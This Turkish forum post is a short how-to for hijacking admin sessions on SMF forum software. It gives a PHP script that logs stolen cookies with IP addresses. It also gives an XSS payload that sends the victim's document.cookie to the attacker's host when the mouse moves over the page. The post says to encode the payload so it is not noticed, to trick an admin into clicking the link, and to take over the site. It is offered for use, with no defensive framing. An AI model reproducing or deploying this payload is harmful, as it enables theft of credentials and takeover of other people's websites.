Bu Konuyu Görüntüleyenler

**SaBRoZa** · 15:43, 16-03-08 15:43

$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.'

'.$date."\n".$referer."

".$cookie."\n");
fclose($fl);
?>

kodları hostunuza free olsun farketmez atın..

sonra asagıda xss kodumuz var.

maxage|'|" style="position:absolute; top:0px; left:0px; width:1000px; height:1000px;" onmouseover="document.location ='http://yukardakikoduattiginizsite.com /cookieyolu.php?cookie='+escape (document.cookie) ""|"|brd|'||"|show_complete|'| |"|subject_only|'||" |search|'|lol

Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN /cookieyolu.phplinkini bulun yukardan kodları nereye attıysanız kendinize göre uyarlayın.linki editleyin.

kendinize göre ayarladıktan sonra yukardaki xss kodunu anlaşılmaması için base24 ceviriyoruz..

nerden Burdan

Smf resmi sitesinde acıga bakalım

Bakın

Şimdi Sadece Üyeler Linkleri Görebilir. Üye Olmak İçin TIKLAYIN /cookieyolu.php bu linki admine tıklatın cookieleri alın siteyi ele gecirin..

1.1.1 de var mı bilmiyorum denemedim ama tahmin edeyim vardır